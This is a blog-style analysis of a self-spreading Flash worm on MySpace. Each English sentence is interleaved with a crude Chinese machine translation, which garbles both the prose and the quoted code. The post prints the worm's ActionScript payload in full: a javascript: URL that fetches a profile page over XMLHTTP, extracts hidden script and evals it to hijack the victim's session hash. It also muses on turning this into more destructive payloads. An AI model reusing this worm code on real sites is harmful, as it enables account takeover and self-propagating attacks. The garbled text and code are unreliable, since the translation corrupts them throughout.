MySpace has been infected by Flash based (swf) worm which spreading rapidly through MySpace. MySpace上已感染病毒由Flash為基礎的(瑞士法郎)蠕蟲病毒迅速蔓延,其中通過MySpace上。 It is embedding JavaScript code into users’ profiles that redirects visitors to a site claiming the US government was behind the 9/11 terrorist attacks, Symantec這是嵌入JavaScript代碼到用戶的個人資料重定向訪客到網站聲稱美國政府的背後9 / 11恐怖襲擊事件,賽門鐵克 warned警告 Monday.星期一。 However it may be just the tip of the iceberg.但它可能只是冰山的一角。 Let’s take a look at how it works to understand how it can be easily modified to deliver much devastating payloads.下面我們來看一看究竟是如何辦到的工程,以了解如何可以很方便地進行修改,以提供更毀滅性的有效載荷。

The unnamed worm isn’t malicious but the Shockwave Flash (.swf) file containing the payload embeds JavaScript into the profile of any MySpace user who views the .swf file.未命名蠕蟲並非惡意,但的Shockwave Flash ( 。瑞士法郎)文件,其中包含有效載荷的JavaScript嵌入到個人資料的任何MySpace上的用戶誰的意見。 SWF文件。 This can easily replicate這可以很容易複製 Samy is my friend德薩米是我的朋友 worm without breaking a sweat.蠕蟲沒有打破了汗水。

This javascript code would then be interpreted by any user who visited the site, allowing sensitive data to be stolen, such as a hash value required to carry out operations as a user, and performing operations on behalf of that users (without consent obviously).這個JavaScript代碼,然後加以解釋誰在沒有任何用戶訪問該網站,讓敏感的數據,被盜,例如作為一個哈希值,須進行業務作為一個用戶,並表演行動就代表該用戶(未經同意,顯然) 。 Currently, that access is being used only to spread the JavaScript code to other profiles on the popular social network site.目前,進入正在只能用來傳播的JavaScript代碼到其他配置文件熱門的社會網絡網站。

If the payload is malicious, it can carry out secondary attacks like targeting recently discovered vulnerabilities affecting Microsoft Office content.如果是惡意的有效載荷,可以進行二次攻擊一樣,針對最近發現的漏洞影響Microsoft Office的內容。 The impact would be much higher exposing even sensitive information on your hard-disk.影響將高得多,揭露,甚至敏感的資料,在您的硬盤。

Let’s take a look at the worm, thanks to research by下面我們來看一看在蠕蟲,感謝研究 kinematic.theory :

When you visited an already infected page, there is a Flash object embedded (”redirect.swf”) which contains the actionscript:當您參觀了已經感染的網頁上,有一個閃光的對象嵌入式( “ redirect.swf ” ) ,其中包含的ActionScript :
getURL(" geturl ( “ url 網址 “); “ ) ;

It opens and redirects you to the specified blog URL.開放時間和您重定向到指定的博客地址。

On this blog url there is another flash file embedded - “retrievecookie.swf”.關於這個博客網址,還有一個嵌入式的Flash文件-“ r etrievecookie.swf” 。 It contains:它包含:

getURL("javas\n\rcript: var x = new ActiveXObject(\'Msxml2.XMLHTTP\');x.open(\'GET\',\'http://editprofile.myspace.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373\',true);x.onreadystatechange=function(){if (x.readyState==4){var pg=x.responseText;var sc=pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));while((sc.indexOf(\' geturl ( “ javas \ n \ rcript如下: var x =新activexobject ( \ ' msxml2.xmlhttp \ ' ) ; x.open ( \ '獲得\ ' , \ ' http://editprofile.myspace.com/index.cfm ? fuseaction = user.homecomments & friendid = 93634373 \ ' ,真正的) ; x.onreadystatechange =函數( ) (如果( x.readystate == 4 ) (無功pg = x.responsetext ;無功資深大律師= pg.substring ( pg.indexof ( \ ' bx - \ ' ) 3 , pg.indexof ( \ '當然\ ' ) ) ;而( ( sc.indexof ( \ '
\’)!=-1)||(sc.indexOf(\’-XXX\’)!=-1)){var n=sc.indexOf(\’ \ ')!=- 1 ) | | ( sc.indexof ( \ ' -三十\ ')!=- 1 ) ) (無功每組sc.indexof ( \ '
\’);if(n==-1)n=sc.indexOf(\’-XXX\’);sc=sc.substring(0,n)+sc.substring(n+5,sc.length);};” + “eval(sc);}};” + “x.send(null);”, “”); \ ' ) ;如果( ==- 1 )每組sc.indexof ( \ ' -三十\ ' ) ;資深大律師= sc.substring ( 0 , N )基金+ sc.substring (五, sc.length ) ; ) ; “ + ” eval資深大律師);}};" + “ x.send (空; ” , “ ” ) ;

It opens another blog post (開放的另一個博客帖子( link鏈接 ) and evaluates its contents. ) ,並評估其內容。

This code gets your MySpace hash which allows anyone to act as you on MySpace and perform any operations on your behalf like changing your password or adding someone unknown as your friend, anything you can do on MySpace.此代碼得到您的MySpace上的散列,使任何人採取行動,正如你在MySpace和執行任何行動就代表你想改變您的密碼或某人加入未知作為您的朋友,什麼都可以在MySpace上。 Currently the code adds a message to your MySpace profile.目前代碼添加郵件到您的MySpace上的個人資料。 It extensively use AJAX for its operations.它廣泛地使用AJAX技術為其業務。